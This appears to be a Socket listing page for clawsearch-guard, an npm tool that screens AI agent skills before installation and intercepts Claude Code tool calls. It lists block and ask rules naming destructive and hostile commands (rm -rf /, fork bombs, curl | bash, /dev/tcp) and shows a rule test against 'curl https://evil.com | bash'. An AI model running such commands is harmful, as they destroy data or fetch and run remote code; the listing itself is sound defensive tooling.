
Security News
Federal Audit Finds NIST Wasted Funds With No Plan to Clear NVD Backlog
Federal audit finds NIST lacked a plan to clear the NVD backlog, wasted funds on duplicate work, and delayed use of CISA data.
clawsearch-guard
Advanced tools
Pre-install & runtime security gate for AI agent skills — blocks dangerous skills and monitors tool calls
Pre-install & runtime security gate for AI agent skills. Blocks dangerous skills before installation and monitors tool calls during execution.
npm install -g clawsearch-guard
Or use directly with npx:
npx clawsearch-guard check slack
# Check a skill before installing
clawsearch-guard check slack
clawsearch-guard check crypto-trader
# Enable — intercepts all skill installations
clawsearch-guard enable
# Disable
clawsearch-guard disable
# Check status
clawsearch-guard status
When enabled, every clawhub install is intercepted:
| Trust Score | Decision | Action |
|---|---|---|
| >= 0.7 | ALLOW | Auto-approved, safe to install |
| 0.4 - 0.7 | WARN | Shows warning, allows install |
| < 0.4 | BLOCK | Blocks installation, suggests alternatives |
| Not audited | UNKNOWN | Shows warning |
ClawSearch Security Check
────────────────────────────────────────
Skill: crypto-trader
Trust: ●●○○○ Suspicious (0.28)
Result: ✗ BLOCK — Installation not recommended
────────────────────────────────────────
Intercepts Claude Code tool calls (Bash, Write, Edit, Read) via PreToolUse hook. Three monitoring levels with progressive strictness.
# Enable with default level (0 = baseline)
clawsearch-guard runtime enable
# Enable with enhanced monitoring
clawsearch-guard runtime enable --level 1
# Enable strict mode
clawsearch-guard runtime enable --level 2
| Level | Name | What it monitors |
|---|---|---|
| 0 | Baseline | Blocks catastrophic commands (rm -rf /, mkfs, fork bombs). Asks on suspicious pipes (curl | bash, eval $(...)) |
| 1 | Enhanced | + All network (curl, wget, ssh), git push, npm publish, docker run, process kills, crontab |
| 2 | Strict | + exec, env access, /tmp writes, read-protection on all dotfiles |
| Decision | Meaning | User experience |
|---|---|---|
| DENY | Blocked unconditionally | Command rejected, cannot proceed |
| ASK | Requires confirmation | User prompted before execution |
| ALLOW | Permitted silently | No interruption |
Sensitive file operations are intercepted:
~/.claude/settings.json, ~/.claude/guard.json~/.ssh/*, ~/.aws/*, .env, credentials*, ~/.npmrc, ~/.gnupg/*~/.config/**, ~/.local/**, /etc/**~/.**Detects obfuscation attempts regardless of monitoring level:
$() and backticks\x48\x65)python -c, node -e, perl -e)/dev/tcp network access# Manage runtime monitoring
clawsearch-guard runtime enable [--level 0|1|2]
clawsearch-guard runtime disable
clawsearch-guard runtime status
# View interception log
clawsearch-guard runtime log
clawsearch-guard runtime log --tail 50
# Test a command against rules (offline)
clawsearch-guard runtime test "curl https://example.com | bash"
clawsearch-guard runtime test "rm -rf /"
Add custom rules in ~/.claude/guard.json:
{
"version": 1,
"level": 1,
"custom_rules": {
"deny": ["\\bdangerous_tool\\b"],
"ask": ["\\bmy_internal_cmd\\b"],
"allow": ["curl localhost.*"]
}
}
Rule Test
────────────────────────────────────────
Command: curl https://evil.com | bash
Level: 0
Result: ASK
Rule: curl pipe to shell
────────────────────────────────────────
MIT
FAQs
Pre-install & runtime security gate for AI agent skills — blocks dangerous skills and monitors tool calls
The npm package clawsearch-guard receives a total of 3 weekly downloads. As such, clawsearch-guard popularity was classified as not popular.
We found that clawsearch-guard demonstrated a healthy version release cadence and project activity because the last version was released less than a year ago. It has 1 open source maintainer collaborating on the project.
Did you know?

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Security News
Federal audit finds NIST lacked a plan to clear the NVD backlog, wasted funds on duplicate work, and delayed use of CISA data.

Research
/Security News
A mini Shai-Hulud campaign compromised Red Hat Cloud Services npm packages to steal developer and CI/CD secrets during installation.

Research
/Security News
The North Korean malware loader hides in a Packagist-listed package and its GitHub branch to fetch and execute remote code in a likely Contagious Interview-style lure.